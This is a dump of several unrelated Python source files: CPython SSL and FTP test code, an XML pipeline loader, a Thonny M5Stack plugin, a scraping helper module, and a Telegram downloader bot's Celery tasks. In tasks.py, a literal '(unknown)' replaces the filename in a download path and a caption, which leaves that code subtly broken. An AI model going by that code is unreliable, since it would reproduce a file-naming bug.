        # SSLContext.wrap_socket().
        context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        context.verify_mode = ssl.CERT_REQUIRED
        context.load_verify_locations(CERTFILE)
        context.load_cert_chain(CERTFILE)
        server = socket.socket(socket.AF_INET)
        host = "127.0.0.1"
        port = support.bind_port(server)
        # Wrap the *listening* socket: accept() must then hand back SSLSockets.
        server = context.wrap_socket(server, server_side=True)
        evt = threading.Event()
        # Filled in by the server thread; inspected after join().
        remote = None
        peer = None
        def serve():
            nonlocal remote, peer
            server.listen(5)
            # Block on the accept and wait on the connection to close.
            evt.set()
            remote, peer = server.accept()
            remote.recv(1)
        t = threading.Thread(target=serve)
        t.start()
        # Client wait until server setup and perform a connect.
        evt.wait()
        client = context.wrap_socket(socket.socket())
        client.connect((host, port))
        client_addr = client.getsockname()
        client.close()
        t.join()
        # Sanity checks.
        self.assertIsInstance(remote, ssl.SSLSocket)
        self.assertEqual(peer, client_addr)
    def test_default_ciphers(self):
        """A client restricted to weak ciphers cannot connect to a default server."""
        context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        try:
            # Force a set of weak ciphers on our client context
            context.set_ciphers("DES")
        except ssl.SSLError:
            self.skipTest("no DES cipher available")
        with ThreadedEchoServer(CERTFILE,
                                ssl_version=ssl.PROTOCOL_SSLv23,
                                chatty=False) as server:
            with socket.socket() as sock:
                s = context.wrap_socket(sock)
                # The handshake must fail: client and server share no cipher.
                with self.assertRaises((OSError, ssl.SSLError)):
                    s.connect((HOST, server.port))
        self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_main(verbose=False):
    """Entry point: sanity-check test fixtures, then run the test classes."""
    if verbose:
        # Report platform and OpenSSL details up front for debugging.
        plats = {
            'Linux': platform.linux_distribution,
            'Mac': platform.mac_ver,
            'Windows': platform.win32_ver,
        }
        for name, func in plats.items():
            plat = func()
            if plat and plat[0]:
                plat = '%s %r' % (name, plat)
                break
        else:
            # No platform-specific probe matched; fall back to the generic string.
            plat = repr(platform.platform())
        print("test_ssl: testing with %r %r" %
              (ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
        print("          under %s" % plat)
        print("          HAS_SNI = %r" % ssl.HAS_SNI)
    # All certificate fixtures must exist before any test runs.
    for filename in [
        CERTFILE, SVN_PYTHON_ORG_ROOT_CERT, BYTES_CERTFILE,
        ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
        BADCERT, BADKEY, EMPTYCERT]:
        if not os.path.exists(filename):
            raise support.TestFailed("Can't read certificate file %r" % filename)
    tests = [ContextTests, BasicSocketTests]
    # Network-dependent and threaded suites are opt-in.
    if support.is_resource_enabled('network'):
        tests.append(NetworkedTests)
    if _have_threads:
        thread_info = support.threading_setup()
        if thread_info and support.is_resource_enabled('network'):
            tests.append(ThreadedTests)
    try:
        support.run_unittest(*tests)
    finally:
        if _have_threads:
            support.threading_cleanup(*thread_info)
# Allow running this test module directly from the command line.
if __name__ == "__main__":
    test_main()
|
pipeline.py | """
pipeline.py
"""
from os import walk
from re import search
from importlib import import_module
from multiprocessing import Process
from pydoc import locate
from lxml import etree
class Pipeline(object):
    """Builds and runs a processing pipeline described by an XML file.

    The XML definition is validated against core/pipeline.xsd, each
    <component> element is dynamically imported from the components/
    directory tree, components are wired together through their
    notifier/observer pairs, and the first component is started in a
    separate process.
    """
    def __init__(self, log_server, file_name):
        super(Pipeline, self).__init__()
        # log_server is handed to every component through its options dict.
        self.log_server = log_server
        # Path of the pipeline XML definition file.
        self.file_name = file_name
    def run(self):
        """Parse the XML definition, instantiate and wire components, start the head."""
        # read xml file; the schema file is opened via a context manager so
        # the handle is closed promptly (the original leaked it).
        with open('core/pipeline.xsd', 'r') as schema_file:
            schema = etree.XMLSchema(etree.XML(schema_file.read()))
        pipeline = etree.parse(self.file_name, etree.XMLParser(schema=schema))
        components = []
        # dynamically load components
        for component in pipeline.xpath('component'):
            # get component class: scan the components/ tree for a module
            # file whose name contains the configured component name
            for root, _, files in walk('components'):
                for fname in files:
                    # r'\.py$': the dot is escaped so only real ".py" files
                    # match (the old '.py$' matched any character before "py")
                    if search(r'\.py$', fname) and component.xpath('name')[0].text in fname:
                        class_path = root.replace('/', '.').replace('\\', '.') \
                            + '.' + fname.replace('.py', '')
                        component_class = getattr(import_module(class_path), component.xpath('class')[0].text)
                        # instantiate class
                        components.append(component_class(self.read_options(component)))
        # glue components together which aren't disabled with autoglue
        for index, component in enumerate(components):
            if index + 1 < len(components) and components[index + 1].auto_glue:
                component.output_notifier.add_observer(components[index + 1].input_observer)
        # add additional components to component
        for component in components:
            if component.additional_components:
                for additional_component in component.additional_components:
                    for b_comp in components:
                        if b_comp.component_id == additional_component['additional_component_id']:
                            notifier = getattr(b_comp, additional_component['notifier'])
                            notifier.add_observer(component.input_observer)
        # start at the head component; it drives the rest through observers
        process = Process(target=components[0].start)
        process.start()
    def read_options(self, component):
        """Collect the constructor options for one <component> element.

        Returns a dict with keys: log_server, component_id, auto_glue,
        properties and additional_components.
        """
        options = dict()
        options['log_server'] = self.log_server
        # read id value (optional element)
        component_id = component.xpath('id')
        if component_id:
            options['component_id'] = component.xpath('id')[0].text
        else:
            options['component_id'] = None
        # read autoglue value; absent or anything other than "false" means True
        options['auto_glue'] = component.xpath('autoglue')
        if options['auto_glue']:
            options['auto_glue'] = component.xpath('autoglue')[0].text
            if options['auto_glue'] == 'true':
                options['auto_glue'] = True
            elif options['auto_glue'] == 'false':
                options['auto_glue'] = False
        else:
            options['auto_glue'] = True
        # read properties; an optional type attribute triggers a typecast
        options['properties'] = dict()
        for component_property in component.xpath('property'):
            property_value = component_property.xpath('value')[0]
            property_value_type = component_property.xpath('value/@type')
            # typecast components
            if property_value_type:
                # pydoc.locate resolves the type name (e.g. "int") to a callable
                property_type = locate(property_value_type[0])
                property_value = property_type(property_value.text)
            else:
                property_value = property_value.text
            options['properties'][component_property.xpath('name')[0].text] = property_value
        # read additional_component
        options['additional_components'] = []
        for additional_component in component.xpath('additional_component'):
            component_id = additional_component.xpath('id')[0].text
            # by convention notifiers has to end with _notifier
            if additional_component.xpath('notifier'):
                notifier = additional_component.xpath('notifier')[0].text + "_notifier"
            else:
                notifier = "output" + "_notifier"
            options['additional_components'].append(dict(additional_component_id=component_id, \
                notifier=notifier))
        return options
|
__init__.py | from thonny.plugins.micropython import MicroPythonProxy, MicroPythonConfigPage,\
add_micropython_backend
from thonny import get_workbench, get_runner, ui_utils
import os
import subprocess
import tkinter as tk
from tkinter import ttk
from urllib.request import urlopen
from thonny.ui_utils import SubprocessDialog
from thonny.running import get_interpreter_for_subprocess
from time import sleep
import json
import threading
INDEX_BASE_URL = "https://thonny.org/m5stack/firmwares"
class M5StackProxy(MicroPythonProxy):
    """Backend proxy for M5Stack boards; inherits MicroPython behaviour unchanged."""
    pass
class M5StackConfigPage(MicroPythonConfigPage):
    """Configuration page for M5Stack; only the USB-driver help link differs."""
    def _get_usb_driver_url(self):
        # M5Stack-specific serial-driver installation instructions.
        return "https://docs.m5stack.com/#/en/related_documents/establish_serial_connection"
class M5Burner(tk.Toplevel):
    """Dialog for selecting an M5Stack firmware to flash.

    Firmware metadata is fetched in a background thread; a periodic
    ``after`` callback moves the results into the combobox on the Tk thread.
    """
    def __init__(self, master):
        tk.Toplevel.__init__(self, master)
        # name -> firmware spec dict, filled in by the download thread.
        self._firmware_infos = {}
        self.title("M5Burner")
        self.columnconfigure(0, weight=1)
        self.rowconfigure(0, weight=1)
        main_frame = ttk.Frame(self)
        main_frame.grid(row=0, column=0, sticky=tk.NSEW, ipadx=15, ipady=15)
        ttk.Label(main_frame, text="Baud rate").grid(row=1, column=0, padx=(15,5), pady=(15,5))
        # NOTE(review): placeholder values — real baud rates still to be filled in.
        self.baud_combo = ttk.Combobox(main_frame,
                                       exportselection=False,
                                       state="readonly",
                                       values = ["a", "b", "c"])
        self.baud_combo.grid(row=1, column=1, columnspan=2, padx=(5,15), pady=(15,5))
        ttk.Label(main_frame, text="Firmware").grid(row=2, column=0, padx=(15,5), pady=5)
        self.firmware_combo = ttk.Combobox(main_frame,
                                           exportselection=False,
                                           state="readonly",
                                           values=[],
                                           height=15)
        self.firmware_combo.grid(row=2, column=1, columnspan=2, padx=(5,15), pady=5)
        # Fetch the index off the UI thread; daemon so it won't block exit.
        threading.Thread(target=self._download_infos, daemon=True).start()
        self._update_state()
    def _download_infos(self):
        """Download the firmware index (runs in a background thread)."""
        url = INDEX_BASE_URL + "/firmware.json"
        with urlopen(url) as f:
            data = json.load(f)
        infos = {}
        for spec in data:
            infos[spec["name"]] = spec
        # Single assignment: the UI thread only ever sees the complete dict.
        self._firmware_infos = infos
    def _update_state(self):
        """Poll for downloaded firmware infos and populate the combobox once."""
        if self._firmware_infos:
            option_values = self.firmware_combo.cget("values")
            if not option_values:
                # NOTE(review): leftover debug print — consider removing.
                print(self._firmware_infos)
                option_values = list(sorted(self._firmware_infos.keys()))
                self.firmware_combo.configure(values=option_values)
        # Re-poll every 300 ms for the dialog's lifetime.
        self.after(300, self._update_state)
def load_plugin():
    """Thonny entry point: register the M5Stack backend and the M5Burner command."""
    add_micropython_backend("M5Stack", M5StackProxy, "MicroPython on M5Stack", M5StackConfigPage)
    def open_m5burner():
        # Open the firmware-burning dialog modally over the workbench.
        dlg = M5Burner(get_workbench())
        ui_utils.show_dialog(dlg)
    get_workbench().add_command("m5burner", "device", "Open M5Burner...",
                                open_m5burner,
                                group=40)
|
utils.py | import requests
import ConfigParser
from bs4 import BeautifulSoup
from time import sleep
from clint.textui import progress
import os, sys, itertools
from threading import Thread
from logs import *
def ip_address():
    """
    Gets current IP address

    Fetches the caller's public IP from an external echo service and
    logs it; nothing is returned.  (Python 2 code.)
    """
    response = requests.get('http://www.ip-addr.es')
    print '[-] GET {0} | {1}'.format(response.status_code, response.url)
    log_info('[+] ip address is: {0}'.format(response.text.strip()))
def config_file(path):
    """
    Reads configuration file

    :param path: filesystem path of an INI-style config file
    :returns: a loaded ConfigParser instance
    :raises IOError: if the file does not exist
    """
    if not os.path.exists(path):
        raise IOError('file not found!')
    log_info('[+] configuration file: {0}'.format(path))
    config = ConfigParser.ConfigParser()
    config.read(path)
    return config
def make_soup(response, debug=False):
    """
    Makes soup from response

    :param response: a requests Response object
    :param debug: when True, pretty-prints the parsed document to stdout
    :returns: a BeautifulSoup object built from response.text
    """
    print '[*] fetching url... {0} | {1}'.format(response.status_code, response.url)
    soup = BeautifulSoup(response.text, from_encoding=response.encoding)
    if debug:
        print soup.prettify().encode('utf-8')
    return soup
def wait(delay):
    """Sleep for `delay` seconds (announced on stdout); no-op for delay <= 0."""
    if delay > 0:
        print '[-] going to sleep {0} seconds'.format(delay)
        sleep(delay)
def download_file(r, url, directory, filename):
    """
    Downloads file with progress bar

    :param r: a requests session (or the requests module) used for the GET
    :param url: URL to download
    :param directory: destination directory, created recursively if missing
    :param filename: name of the file to write inside `directory`
    :returns: the full path of the downloaded file
    """
    if not os.path.exists(directory):
        # creates directories recursively
        os.makedirs(directory)
        log_info('[+] created new directory: ' + directory)
    path = os.path.join(directory, filename)
    print '[-] downloading file from url: {0}'.format(url)
    response = r.get(url, stream=True)
    with open(path, 'wb') as f:
        # NOTE(review): assumes the server sends a Content-Length header;
        # int(None) would raise TypeError otherwise — confirm upstream.
        total_length = int(response.headers.get('content-length'))
        for chunk in progress.bar(response.iter_content(chunk_size=1024), expected_size=(total_length/1024) + 1):
            if chunk:
                f.write(chunk)
                f.flush()
    log_success('[+] new download: {0}'.format(path))
    return path
def thread_loader(function):
    """
    Starts a thread with loading bar

    Runs `function` in a background thread while animating a spinner on
    stdout until the thread finishes.  (Python 2: uses iterator .next().)
    """
    thread = Thread(target=function)
    thread.start()
    spinner = itertools.cycle(['-', '/', '|', '\\'])
    while thread.is_alive():
        sys.stdout.write(spinner.next())
        sys.stdout.flush()
        # erase the last written char
        sys.stdout.write('\b')
|
tasks.py | #!/usr/local/bin/python3
# coding: utf-8
# ytdlbot - tasks.py
# 12/29/21 14:57
#
__author__ = "Benny <benny.think@gmail.com>"
import json
import logging
import os
import pathlib
import re
import subprocess
import tempfile
import threading
import time
from urllib.parse import quote_plus
import psutil
import requests
from apscheduler.schedulers.background import BackgroundScheduler
from celery import Celery
from celery.worker.control import Panel
from pyrogram import idle
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
from requests_toolbelt.multipart.encoder import MultipartEncoder
from client_init import create_app
from config import (ARCHIVE_ID, AUDIO_FORMAT, BROKER, ENABLE_CELERY,
ENABLE_VIP, TG_MAX_SIZE, WORKERS)
from constant import BotText
from db import Redis
from downloader import (edit_text, sizeof_fmt, tqdm_progress, upload_hook,
ytdl_download)
from limit import VIP
from utils import (apply_log_formatter, auto_restart, customize_logger,
get_metadata, get_revision, get_user_settings)
# Module-level setup: tame noisy third-party loggers and install the
# project-wide log format before anything else runs.
customize_logger(["pyrogram.client", "pyrogram.session.session", "pyrogram.connection.connection"])
apply_log_formatter()
bot_text = BotText()
# Scheduler fires every few seconds; stop its executor logs from propagating.
logging.getLogger('apscheduler.executors.default').propagate = False
# celery -A tasks worker --loglevel=info --pool=solo
# app = Celery('celery', broker=BROKER, accept_content=['pickle'], task_serializer='pickle')
app = Celery('tasks', broker=BROKER)
# Pyrogram client shared by all tasks in this worker process.
celery_client = create_app(":memory:")
def get_messages(chat_id, message_id):
    """Fetch a Telegram message, restarting the client once on ConnectionError."""
    try:
        return celery_client.get_messages(chat_id, message_id)
    except ConnectionError as e:
        logging.critical("WTH!!! %s", e)
        # Client was not started (or dropped); start it and retry once.
        celery_client.start()
        return celery_client.get_messages(chat_id, message_id)
@app.task()
def ytdl_download_task(chat_id, message_id, url):
    """Celery task: run a yt-dl download for the message identified by chat/message id."""
    logging.info("YouTube celery tasks started for %s", url)
    bot_msg = get_messages(chat_id, message_id)
    ytdl_normal_download(bot_msg, celery_client, url)
    logging.info("YouTube celery tasks ended.")
@app.task()
def audio_task(chat_id, message_id):
    """Celery task: extract audio from the video attached to the given message."""
    logging.info("Audio celery tasks started for %s-%s", chat_id, message_id)
    bot_msg = get_messages(chat_id, message_id)
    normal_audio(bot_msg, celery_client)
    logging.info("Audio celery tasks ended.")
def get_unique_clink(clink, settings):
    """Build a cache key from a canonical link plus the user's settings.

    Appends "?p=<settings[1]><settings[2]>" when at least two entries follow
    the first settings element; otherwise the bare canonical link is the key.
    """
    extras = settings[1:]
    if len(extras) >= 2:
        return "{}?p={}{}".format(clink, extras[0], extras[1])
    # Not enough settings to qualify the link — fall back to the plain clink.
    return clink
@app.task()
def direct_download_task(chat_id, message_id, url):
    """Celery task: download an arbitrary URL directly (no yt-dl extraction)."""
    logging.info("Direct download celery tasks started for %s", url)
    bot_msg = get_messages(chat_id, message_id)
    direct_normal_download(bot_msg, celery_client, url)
    logging.info("Direct download celery tasks ended.")
def forward_video(chat_id, url, client):
    """Serve a previously-downloaded video from cache by forwarding it.

    Returns True when a cached copy was successfully forwarded to chat_id;
    returns falsy (False or implicit None) when there is no cache entry or
    forwarding failed, in which case the caller should download normally.
    """
    red = Redis()
    vip = VIP()
    settings = get_user_settings(str(chat_id))
    clink = vip.extract_canonical_link(url)
    unique = get_unique_clink(clink, settings)
    cache = red.get_send_cache(unique)
    if not cache:
        return False
    # cache maps source chat id -> JSON-encoded message id(s) of prior sends
    for uid, mid in cache.items():
        uid, mid = int(uid), json.loads(mid)
        try:
            fwd_msg = client.forward_messages(chat_id, uid, mid)
            if not fwd_msg:
                raise ValueError("Failed to forward message")
            red.update_metrics("cache_hit")
            if not isinstance(fwd_msg, list):
                fwd_msg = [fwd_msg]
            for fwd in fwd_msg:
                if ENABLE_VIP:
                    # Fall back to 1024 bytes when neither size is available.
                    file_size = getattr(fwd.document, "file_size", None) or getattr(fwd.video, "file_size", 1024)
                    # TODO: forward file size may exceed the limit
                    vip.use_quota(chat_id, file_size)
                # Record the forwarded copy so future requests hit cache too.
                red.add_send_cache(unique, chat_id, fwd.message_id)
            return True
        except Exception as e:
            # Stale cache entry (e.g. source message deleted): drop it and
            # fall through; implicit None return means "cache miss".
            logging.error("Failed to forward message %s", e)
            red.del_send_cache(unique, uid)
            red.update_metrics("cache_miss")
def ytdl_download_entrance(bot_msg, client, url):
    """Route a yt-dl request: serve from cache, queue on Celery, or run inline."""
    chat_id = bot_msg.chat.id
    # Cache hit: the video was forwarded already, nothing left to do.
    if forward_video(chat_id, url, client):
        return
    # Last settings entry selects the execution mode (None defaults to Celery).
    mode = get_user_settings(str(chat_id))[-1]
    if ENABLE_CELERY and mode in [None, "Celery"]:
        ytdl_download_task.delay(chat_id, bot_msg.message_id, url)
    else:
        ytdl_normal_download(bot_msg, client, url)
def direct_download_entrance(bot_msg, client, url):
    """Route a direct-download request; currently always runs inline."""
    if ENABLE_CELERY:
        # TODO disable it for now
        direct_normal_download(bot_msg, client, url)
        # direct_download_task.delay(bot_msg.chat.id, bot_msg.message_id, url)
    else:
        direct_normal_download(bot_msg, client, url)
def audio_entrance(bot_msg, client):
    """Route an audio-extraction request to Celery or run it inline."""
    if ENABLE_CELERY:
        audio_task.delay(bot_msg.chat.id, bot_msg.message_id)
    else:
        normal_audio(bot_msg, client)
def direct_normal_download(bot_msg, client, url):
    """Download `url` with requests and send it back to the chat as a document.

    Enforces the VIP quota (when enabled) using the Content-Length reported
    by a HEAD request, streams the body to a temp file with progress edits,
    then uploads it via the Telegram client.
    """
    chat_id = bot_msg.chat.id
    headers = {
        "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"}
    vip = VIP()
    length = 0
    if ENABLE_VIP:
        remain, _, _ = vip.check_remaining_quota(chat_id)
        try:
            # Probe the size first so the quota check happens before download.
            head_req = requests.head(url, headers=headers)
            length = int(head_req.headers.get("content-length"))
        except (TypeError, requests.exceptions.RequestException):
            # Missing Content-Length (int(None)) or network failure: treat as 0.
            length = 0
        if remain < length:
            bot_msg.reply_text(f"Sorry, you have reached your quota.\n")
            return
    req = None
    try:
        req = requests.get(url, headers=headers, stream=True)
        length = int(req.headers.get("content-length"))
        filename = re.findall("filename=(.+)", req.headers.get("content-disposition"))[0]
    except TypeError:
        # No Content-Disposition header: derive a name from the URL tail.
        filename = getattr(req, "url", "").rsplit("/")[-1]
    except Exception as e:
        bot_msg.edit_text(f"Download failed!❌\n\n```{e}```", disable_web_page_preview=True)
        return
    if not filename:
        filename = quote_plus(url)
    with tempfile.TemporaryDirectory() as f:
        # NOTE(review): "(unknown)" looks like a placeholder — presumably this
        # should incorporate `filename`; confirm against upstream history.
        filepath = f"{f}/(unknown)"
        # consume the req.content
        downloaded = 0
        for chunk in req.iter_content(1024 * 1024):
            text = tqdm_progress("Downloading...", length, downloaded)
            edit_text(bot_msg, text)
            # NOTE(review): the file is re-opened in append mode per chunk;
            # a single open around the loop would be cheaper.
            with open(filepath, "ab") as fp:
                fp.write(chunk)
            downloaded += len(chunk)
        logging.info("Downloaded file %s", filename)
        st_size = os.stat(filepath).st_size
        if ENABLE_VIP:
            vip.use_quota(chat_id, st_size)
        client.send_chat_action(chat_id, "upload_document")
        client.send_document(bot_msg.chat.id, filepath,
                             caption=f"filesize: {sizeof_fmt(st_size)}",
                             progress=upload_hook, progress_args=(bot_msg,),
                             )
        bot_msg.edit_text(f"Download success!✅")
def normal_audio(bot_msg, client):
    """Extract the audio track from the video/document attached to bot_msg.

    Downloads the media to a temp dir, converts it with ffmpeg (stream-copy
    first, re-encode as fallback), and sends the audio back to the chat.
    """
    chat_id = bot_msg.chat.id
    # Media may arrive either as a video or as a generic document.
    fn = getattr(bot_msg.video, "file_name", None) or getattr(bot_msg.document, "file_name", None)
    with tempfile.TemporaryDirectory() as tmp:
        logging.info("downloading to %s", tmp)
        base_path = pathlib.Path(tmp)
        video_path = base_path.joinpath(fn)
        # Same base name, audio extension from config (e.g. .m4a).
        audio = base_path.joinpath(fn).with_suffix(f".{AUDIO_FORMAT}")
        client.send_chat_action(chat_id, 'record_video_note')
        client.download_media(bot_msg, video_path)
        logging.info("downloading complete %s", video_path)
        # execute ffmpeg
        client.send_chat_action(chat_id, 'record_audio')
        try:
            # First try a lossless stream copy of the audio track.
            subprocess.check_output(["ffmpeg", "-y", "-i", video_path, "-vn", "-acodec", "copy", audio])
        except subprocess.CalledProcessError:
            # CPU consuming if re-encoding.
            subprocess.check_output(["ffmpeg", "-y", "-i", video_path, audio])
        client.send_chat_action(chat_id, 'upload_audio')
        client.send_audio(chat_id, audio)
        Redis().update_metrics("audio_success")
def get_dl_source():
    """Return an attribution line naming this worker, or '' when
    WORKER_NAME is unset or empty."""
    name = os.environ.get("WORKER_NAME")
    return "Downloaded by %s" % name if name else ""
def upload_transfer_sh(paths: list) -> "str":
    """Upload files to transfer.sh; return the share links (one per line).

    :param paths: list of pathlib.Path objects to upload in one multipart POST
    :returns: transfer.sh response with each URL on its own line, or an
        error string when the request fails
    """
    # Multipart field per file: name -> (filename, open file handle).
    d = {p.name: (p.name, p.open("rb")) for p in paths}
    m = MultipartEncoder(fields=d)
    headers = {'Content-Type': m.content_type}
    try:
        req = requests.post("https://transfer.sh", data=m, headers=headers)
        # Put each returned URL on its own line for readability.
        return re.sub(r"https://", "\nhttps://", req.text)
    except requests.exceptions.RequestException as e:
        return f"Upload failed!❌\n\n```{e}```"
def ytdl_normal_download(bot_msg, client, url):
    """Download `url` with yt-dl and send the result to the chat.

    Sends as document/audio/video per user settings, falls back to a
    transfer.sh upload when the file exceeds Telegram's size limit, caches
    successful sends in Redis, and optionally mirrors to ARCHIVE_ID.
    """
    chat_id = bot_msg.chat.id
    temp_dir = tempfile.TemporaryDirectory()
    red = Redis()
    result = ytdl_download(url, temp_dir.name, bot_msg)
    logging.info("Download complete.")
    # Inline button offering on-demand audio extraction of the sent video.
    markup = InlineKeyboardMarkup(
        [
            [  # First row
                InlineKeyboardButton(  # Generates a callback query when pressed
                    f"convert to audio({AUDIO_FORMAT})",
                    callback_data="convert"
                )
            ]
        ]
    )
    if result["status"]:
        client.send_chat_action(chat_id, 'upload_document')
        video_paths = result["filepath"]
        bot_msg.edit_text('Download complete. Sending now...')
        for video_path in video_paths:
            # normally there's only one video in that path...
            filename = video_path.name
            remain = bot_text.remaining_quota_caption(chat_id)
            st_size = os.stat(video_path).st_size
            size = sizeof_fmt(st_size)
            if st_size > TG_MAX_SIZE:
                # Too big for Telegram: push everything to transfer.sh instead.
                t = f"Your video size is {size} which is too large for Telegram. I'll upload it to transfer.sh"
                bot_msg.edit_text(t)
                client.send_chat_action(chat_id, 'upload_document')
                client.send_message(chat_id, upload_transfer_sh(video_paths))
                return
            meta = get_metadata(video_path)
            worker = get_dl_source()
            # NOTE(review): "(unknown)" looks like a redacted placeholder for
            # the filename in this caption — confirm against upstream.
            cap = f"`(unknown)`\n\n{url}\n\nInfo: {meta['width']}x{meta['height']} {size} {meta['duration']}s" \
                  f"\n{remain}\n{worker}"
            settings = get_user_settings(str(chat_id))
            if ARCHIVE_ID:
                # Redirect the upload to the archive channel; the original
                # chat gets a forward below.
                chat_id = ARCHIVE_ID
            if settings[2] == "document":
                logging.info("Sending as document")
                res_msg = client.send_document(chat_id, video_path,
                                               caption=cap,
                                               progress=upload_hook, progress_args=(bot_msg,),
                                               reply_markup=markup,
                                               thumb=meta["thumb"]
                                               )
            elif settings[2] == "audio":
                logging.info("Sending as audio")
                res_msg = client.send_audio(chat_id, video_path,
                                            caption=cap,
                                            progress=upload_hook, progress_args=(bot_msg,),
                                            )
            else:
                logging.info("Sending as video")
                res_msg = client.send_video(chat_id, video_path,
                                            supports_streaming=True,
                                            caption=cap,
                                            progress=upload_hook, progress_args=(bot_msg,),
                                            reply_markup=markup,
                                            **meta
                                            )
            # Cache the sent message so future requests can be forwarded.
            clink = VIP().extract_canonical_link(url)
            unique = get_unique_clink(clink, settings)
            red.add_send_cache(unique, res_msg.chat.id, res_msg.message_id)
            red.update_metrics("video_success")
            if ARCHIVE_ID:
                client.forward_messages(bot_msg.chat.id, ARCHIVE_ID, res_msg.message_id)
        bot_msg.edit_text('Download success!✅')
    else:
        client.send_chat_action(chat_id, 'typing')
        # Truncate the traceback so it fits in a Telegram message.
        tb = result["error"][0:4000]
        bot_msg.edit_text(f"Download failed!❌\n\n```{tb}```", disable_web_page_preview=True)
    temp_dir.cleanup()
@Panel.register
def ping_revision(*args):
    """Celery remote-control command: report this worker's git revision."""
    return get_revision()
@Panel.register
def hot_patch(*args):
    """Celery remote-control command: git-pull the app, reinstall deps, restart.

    Kills the current process at the end; the supervisor is expected to
    restart it with the updated code.
    """
    app_path = pathlib.Path().cwd().parent
    logging.info("Hot patching on path %s...", app_path)
    apk_install = "xargs apk add < apk.txt"
    pip_install = "pip install -r requirements.txt"
    # Drop CI-injected auth header so the pull uses normal credentials.
    unset = "git config --unset http.https://github.com/.extraheader"
    pull_unshallow = "git pull origin --unshallow"
    pull = "git pull"
    subprocess.call(unset, shell=True, cwd=app_path)
    # Shallow clones must be unshallowed first; non-zero means already full.
    if subprocess.call(pull_unshallow, shell=True, cwd=app_path) != 0:
        logging.info("Already unshallow, pulling now...")
        subprocess.call(pull, shell=True, cwd=app_path)
    logging.info("Code is updated, applying hot patch now...")
    subprocess.call(apk_install, shell=True, cwd=app_path)
    subprocess.call(pip_install, shell=True, cwd=app_path)
    # Suicide: rely on the process supervisor to restart the worker.
    psutil.Process().kill()
def run_celery():
    """Start the Celery worker in-process, using a thread pool sized by WORKERS."""
    worker_args = ["-A", "tasks", "worker", "--loglevel=info", "--pool=threads"]
    worker_args.append("--concurrency=%s" % WORKERS)
    # Name the worker after the WORKER_NAME env var (empty when unset).
    worker_args += ["-n", os.getenv("WORKER_NAME", "")]
    app.worker_main(worker_args)
if __name__ == '__main__':
    # Standalone worker bootstrap: start the Telegram client, then Celery in
    # a daemon thread, then a watchdog scheduler, and finally block on idle().
    celery_client.start()
    print("Bootstrapping Celery worker now.....")
    # Give the client a moment to finish its handshake before Celery starts.
    time.sleep(5)
    threading.Thread(target=run_celery, daemon=True).start()
    scheduler = BackgroundScheduler(timezone="Asia/Shanghai")
    # Watchdog: auto_restart is polled every 5 seconds.
    scheduler.add_job(auto_restart, 'interval', seconds=5)
    scheduler.start()
    idle()
    celery_client.stop()
|
test_ftplib.py | """Test script for ftplib module."""
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import time
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase, skipUnless
from test import support
from test.support import HOST, HOSTv6
threading = support.import_module('threading')
TIMEOUT = 3
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
MLSD_DATA = (
'type=cdir;perm=el;unique==keVO1+ZF4; test\r\ntype=pdir;perm=e;unique==keVO1+d?3; ..\r\ntype=OS.unix=slink:/foobar;perm=;unique==keVO1+4G4; foobar\r\ntype=OS.unix=chr-13/29;perm=;unique==keVO1+5G4; device\r\ntype=OS.unix=blk-11/108;perm=;unique==keVO1+6G4; block\r\ntype=file;perm=awr;unique==keVO1+8G4; writable\r\ntype=dir;perm=cpmel;unique==keVO1+7G4; promiscuous\r\ntype=dir;perm=;unique==keVO1+1t2; no-exec\r\ntype=file;perm=r;unique==keVO1+EG4; two words\r\ntype=file;perm=r;unique==keVO1+IH4; leading space\r\ntype=file;perm=r;unique==keVO1+1G4; file1\r\ntype=dir;perm=cpmel;unique==keVO1+7G4; incoming\r\ntype=file;perm=r;unique==keVO1+1G4; file2\r\ntype=file;perm=r;unique==keVO1+1G4; file3\r\ntype=file;perm=r;unique==keVO1+1G4; file4\r\n'
)
class DummyDTPHandler(asynchat.async_chat):
    """Data-channel stub for the dummy FTP server.

    Decodes everything it receives into the owning control handler's
    ``last_received_data`` and pushes a 226 reply when the transfer ends.
    """
    # Guards against pushing "226 transfer complete" more than once.
    dtp_conn_closed = False
    def __init__(self, conn, baseclass):
        asynchat.async_chat.__init__(self, conn)
        # The DummyFTPHandler that spawned this data connection.
        self.baseclass = baseclass
        self.baseclass.last_received_data = ''
    def handle_read(self):
        self.baseclass.last_received_data += self.recv(1024).decode('ascii')
    def handle_close(self):
        # XXX: this method can be called many times in a row for a single
        # connection, including in clear-text (non-TLS) mode.
        if not self.dtp_conn_closed:
            self.baseclass.push('226 transfer complete')
            self.close()
            self.dtp_conn_closed = True
    def push(self, what):
        # Tests can force the next payload via the control handler.
        if self.baseclass.next_data is not None:
            what = self.baseclass.next_data
            self.baseclass.next_data = None
        if not what:
            return self.close_when_done()
        super(DummyDTPHandler, self).push(what.encode('ascii'))
    def handle_error(self):
        # Fail loudly: asyncore would otherwise swallow the exception.
        raise Exception
class DummyFTPHandler(asynchat.async_chat):
    """Control-channel stub for the dummy FTP server used by the tests.

    Each FTP verb received is dispatched to the matching ``cmd_<verb>``
    method; unknown verbs get a 550 reply.  Data transfers go through
    ``dtp_handler`` instances.
    """
    dtp_handler = DummyDTPHandler
    def __init__(self, conn):
        asynchat.async_chat.__init__(self, conn)
        # tells the socket to handle urgent data inline (ABOR command)
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
        self.set_terminator(b'\r\n')
        self.in_buffer = []
        self.dtp = None
        self.last_received_cmd = None
        self.last_received_data = ''
        # Tests may preload a canned reply / payload for the next command.
        self.next_response = ''
        self.next_data = None
        self.rest = None
        self.next_retr_data = RETR_DATA
        self.push('220 welcome')
    def collect_incoming_data(self, data):
        self.in_buffer.append(data)
    def found_terminator(self):
        """Dispatch one complete command line to its cmd_* handler."""
        line = b''.join(self.in_buffer).decode('ascii')
